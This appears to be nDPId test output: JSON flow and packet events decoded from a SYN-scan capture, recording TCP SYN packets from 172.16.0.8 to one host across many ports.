-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsDm4AADsG\/wSsEAAIQA2GNIzTGvXdU4MZAAAAAGACEAANlwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAseEgAADoGliqsEAAIQA2GNIzSBdbdUoMYAAAAAGACDAAmuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAsyqkAADcGRsmsEAAIQA2GNIzSFxfdUoMYAAAAAGACEAAReAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dQAACUGKZ6sEAAIQA2GNIzSgALdUoMYAAAAAGACCACwjAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBNYAADsGCJ2sEAAIQA2GNIzS92PdUoMYAAAAAGACEAAxKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAs6IMAADgGJ++sEAAIQA2GNIzSBZrdUoMYAAAAAGACBAAu9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZcAADAGytusEAAIQA2GNIzSE8XdUoMYAAAAAGACBAAgygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AADcGCySsEAAIQA2GNIzSB\/3dUoMYAAAAAGACEAAgkgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsHVIAADEG+iCsEAAIQA2GNIzSA4\/dUoMYAAAAAGACCAAtAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqwAACgGscasEAAIQA2GNIzSF6vdUoMYAAAAAGACBAAc5AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsF7gAACwGBLusEAAIQA2GNIzSBK7dUoMYAAAAAGACBAAv4QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqY8AADIGbOOsEAAIQA2GNIzSIzPdUoMYAAAAAGACDAAJXAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsf8MAADYGkq+sEAAIQA2GNIzSBizdUoMYAAAAAGACDAAmYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsUswAACYGz6asEAAIQA2GNIzSB\/jdUoMYAAAAAGACDAAklwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CMAACwGME+sEAAIQA2GNIzSF+vdUoMYAAAAAGACBAAcpAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsccoAADkGnaisEAAIQA2GNIzSDvTdUoMYAAAAAGACCAAhmwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEQAADMGbS6sEAAIQA2GNIzSII3dUoMYAAAAAGACEAAIAgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6oAACoGrsisEAAIQA2GNIzSH1bdUoMYAAAAAGACDAANOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsZRYAADAGs1ysEAAIQA2GNIzSFbPdUoMYAAAAAGACBAAe3AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsmgoAADQGemisEAAIQA2GNIzS1xDdUoMYAAAAAGACBABdfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsSTIAACkG1kCsEAAIQA2GNIzSCHDdUoMYAAAAAGACCAAoHwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsfbAAACoGoMKsEAAIQA2GNIzSIc7dUoMYAAAAAGACDAAKwQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GIAACkGMxCsEAAIQA2GNIzSw1bdUoMYAAAAAGACCABtOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsus4AACoGY6SsEAAIQA2GNIzSCT7dUoMYAAAAAGACDAAjUQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 